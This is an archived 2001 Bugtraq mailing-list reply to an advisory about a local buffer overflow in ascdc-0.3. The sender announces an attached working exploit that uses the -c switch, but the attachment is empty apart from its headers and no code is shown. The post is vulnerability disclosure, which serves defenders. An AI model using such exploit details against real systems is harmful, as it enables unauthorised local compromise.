[19584] in bugtraq

Re: ascdc Buffer Overflow Vulnerability

daemon@ATHENA.MIT.EDU (The Itch)
Sun Mar 11 12:59:55 2001

MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1087674738-257111439-984170536=:30047"
Message-ID:  <Pine.LNX.4.21.0103092140210.30047-200000@bse.die.ms>
Date:         Fri, 9 Mar 2001 21:42:16 +0100
Reply-To: The Itch <itchie@BSE.DIE.MS>
From: The Itch <itchie@BSE.DIE.MS>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <OF3493DBD1.A261E083-ONC1256A09.003D8E22@wkit.se>

--1087674738-257111439-984170536=:30047
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: QUOTED-PRINTABLE

On Thu, 8 Mar 2001 advisories@WKIT.COM wrote:

> TITLE:          ascdc Buffer Overflow Vulnerability
> ADVISORY ID:    WSIR-01/02-06
> DISCOVERED BY:  Christer Öberg, Wkit Security AB
> CONTACT:        advisories@wkit.com, Wkit Security AB
> CLASS:          Buffer Overflow
> OBJECT:         ascdc (exec)
> VENDOR:         Rob Malda (http://www.CmdrTaco.net)
> REMOTE:         No
> LOCAL:          Yes
> VULNERABLE:     ascdc-0.3
>
>

Attached is a working version of the exploit for ascdc-0.3 using the -c
switch this time.

--

- The Itch
	http://bse.die.ms

--1087674738-257111439-984170536=:30047
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN; name="ascdcx.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0103092142160.30047@bse.die.ms>
Content-Description:
Content-Disposition: attachment; filename="ascdcx.c"
--1087674738-257111439-984170536=:30047--